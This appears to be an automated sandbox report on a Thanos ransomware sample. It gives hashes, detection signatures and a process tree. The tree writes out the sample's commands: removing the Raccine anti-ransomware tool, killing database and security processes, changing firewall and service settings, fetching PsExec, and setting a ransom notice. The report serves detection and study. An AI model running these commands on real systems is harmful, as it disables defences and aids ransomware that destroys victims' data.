Analysis
-
max time kernel
231s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
18-01-2022 15:29
Static task
static1
Behavioral task
behavioral1
Sample
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Resource
win10v2004-en-20220113
General
-
Target
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
-
Size
133KB
-
MD5
91b493febfc1d782875a09fc076a8850
-
SHA1
ed12cfbedc90181e869fce19dc820063fa6b3179
-
SHA256
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327
-
SHA512
bb66d4d65f8f615e6af06f4815233a2a7430373e4afc5a61a2b2fff0dc9a6a002b4edad0db2a336b24dabd65efc3b74f57985836d137f25eb87a1901cfa4b9a9
Malware Config
Signatures
-
Detect the Prometheus's Thanos ransomware using the build ID and the Killproc strings. 1 IoCs
Detect the Prometheus's Thanos ransomware.
Processes:
resource yara_rule behavioral1/memory/780-55-0x00000000011C0000-0x00000000011E8000-memory.dmp ransomware_win_thanos -
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 13 http://live.sysinternals.com/PsExec64.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process File renamed C:\Users\Admin\Pictures\WaitJoin.crw => C:\Users\Admin\Pictures\WaitJoin.crw.REV f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\Admin\Pictures\WaitJoin.crw.REV f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2024 cmd.exe -
Drops startup file 1 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Drops desktop.ini file(s) 6 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process File opened (read-only) \??\F: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\K: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\V: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\M: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\U: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\I: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\O: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\J: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\X: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\N: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\Y: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\P: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\S: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\B: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\W: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\T: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\Z: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\A: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\G: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\H: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\L: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\Q: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\E: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe File opened (read-only) \??\R: f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1748 taskkill.exe 1736 taskkill.exe 1156 taskkill.exe 824 taskkill.exe 1012 taskkill.exe 1780 taskkill.exe 1604 taskkill.exe 360 taskkill.exe 1888 taskkill.exe 1908 taskkill.exe 1028 taskkill.exe 1648 taskkill.exe 772 taskkill.exe 112 taskkill.exe 1488 taskkill.exe 1412 taskkill.exe 1828 taskkill.exe 1772 taskkill.exe 1856 taskkill.exe 1156 taskkill.exe 1384 taskkill.exe 1860 taskkill.exe 992 taskkill.exe 1612 taskkill.exe 1792 taskkill.exe 1372 taskkill.exe 1744 taskkill.exe 1560 taskkill.exe 1372 taskkill.exe 1848 taskkill.exe 1832 taskkill.exe 1180 taskkill.exe 548 taskkill.exe 908 taskkill.exe 880 taskkill.exe 1692 taskkill.exe 900 taskkill.exe 1660 taskkill.exe 564 taskkill.exe 1096 taskkill.exe 308 taskkill.exe 848 taskkill.exe 1344 taskkill.exe 1724 taskkill.exe 1412 taskkill.exe 1844 taskkill.exe 1348 taskkill.exe 1824 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exepid process 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe Token: SeDebugPrivilege 1096 taskkill.exe Token: SeDebugPrivilege 112 taskkill.exe Token: SeDebugPrivilege 308 taskkill.exe Token: SeDebugPrivilege 548 taskkill.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeDebugPrivilege 908 taskkill.exe Token: SeDebugPrivilege 1748 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 1384 taskkill.exe Token: SeDebugPrivilege 1844 taskkill.exe Token: SeDebugPrivilege 1348 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 360 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 1908 taskkill.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 900 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 992 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 1824 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 772 taskkill.exe Token: SeDebugPrivilege 1780 taskkill.exe Token: SeDebugPrivilege 564 taskkill.exe Token: SeDebugPrivilege 1848 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1180 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 824 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exemshta.exepid process 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 1372 mshta.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exepid process 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription pid process target process PID 780 wrote to memory of 1096 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1096 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1096 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1396 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1396 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1396 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1732 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1732 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1732 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe reg.exe PID 780 wrote to memory of 1880 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe schtasks.exe PID 780 wrote to memory of 1880 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe schtasks.exe PID 780 wrote to memory of 1880 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe schtasks.exe PID 780 wrote to memory of 1896 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1896 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1896 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1108 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1108 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1108 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1536 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1536 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1536 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1728 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1728 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1728 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1600 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1600 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1600 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1956 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1956 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1956 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1048 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1048 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1048 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 852 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 852 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 852 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1036 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1036 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 1036 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe sc.exe PID 780 wrote to memory of 112 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 112 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 112 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 308 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 308 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 308 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 548 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 548 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 548 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1488 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1488 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1488 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 908 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 908 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 908 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1748 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1748 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1748 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1332 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1332 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1332 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe netsh.exe PID 780 wrote to memory of 1412 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1412 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1412 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe PID 780 wrote to memory of 1384 780 f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe taskkill.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe"C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:780 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1396
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1732
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1880
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1896
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1108
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1536
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1728
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1600
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1956
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1048
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:852
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1036
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
